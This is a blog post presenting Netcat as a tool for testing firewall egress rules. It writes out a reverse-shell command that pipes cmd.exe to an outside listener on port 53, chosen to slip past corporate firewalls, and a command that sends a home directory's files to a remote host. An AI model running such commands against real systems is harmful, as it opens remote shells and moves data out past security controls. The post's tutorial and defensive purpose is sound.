Swiss Army Knife for TCP/IP

Last week I wrote about Vyatta firewall, by far one of the best free firewall software out there today. This week, I’ll discuss a free often over looked security tool referred to as the Swiss Army knife for TCP/IP.

The tool I’m thinking of is “Netcat”, an application capable of reading network output, writing network input and redirecting or piping that input/output to a host of your choosing. Originally, an individual called “Hobbit” wrote Netcat for Unix however it was quickly ported to Windows by Weld Pond making Netcat a cross platform tool. Today ‘Netcat’ is available for Linux, Mac and Windows. The reason it’s called the Swiss Army knife for TCP/IP is because it’s so darn flexible in its use. In its simplest form, Netcat can be used in establishing reverse shell connections through home or corporate firewalls.

A reverse connection involves an active ‘Netcat’ connection originating from a source host typically on an inside trusted network happily traversing a firewall to a listening host on the outside untrusted network and piping application output from source to target. The beauty of Netcat really shines when you realize that you can get it listening on any port making it very flexible and useful in testing firewall egress rules.  For example; 

From a Windows host outside the firewall (external network) run ‘Netcat’ listening on port 53.

nc -L -p 53

Then from inside the firewall (internal network) connect to the listening machine specifying the target IP address, port combination on the outside network. “–e cmd.exe” will execute Windows command shell.

nc <IP ADDRESS> 53 -e cmd.exe

If you’ve done things correctly you should see a command shell from the internal host, displayed on the listening host outside your internal network. At this point ‘Netcat’ will gladly pipe all commands and command output between the two hosts effectively bypassing any security devices. This type of connection is called a reverse connection because the internal host initiates the connection to an outside host. Typically outside clients initiate connections to internal servers. One reason why I’ve chosen port 53 is because often its given egress privileges through corporate firewalls. Don’t forget ‘Netcat’ will happily play with both TCP and UDP.

Netcat can be used with forward connections, reverse connections but also as a simple data transfer agent, and it doesn’t really matter which end is the listener and which end is the client — input at one side arrives at the other side as output.

            nc -l -p 443 | uncompress -c | tar xvfp -

and then on the other side

            tar cfp – /home/dir | compress -c | nc -w 3 <IP ADDRESS> 443

Above example will uncompress an archive on one machine and send the output through ‘Netcat’ to secondary host recreating the compressed archive.

Netcat can be used as a Telnet client, and one time Web Server, however, by far its claim to fame has come from the hacker community. Some consider Netcat a hacker tool only used in establishing reverse connections. However I don’t consider ‘Netcat’ an evil hacker tool, in fact I consider ‘Netcat’ a white hacker-testing tool. ‘Netcat’ can help in testing your firewall egress rules and traffic anti-spoofing tools. Go ahead and give Netcat a try in your environment and next week I’ll discuss how you can protect yourself against reverse connections via Netcat.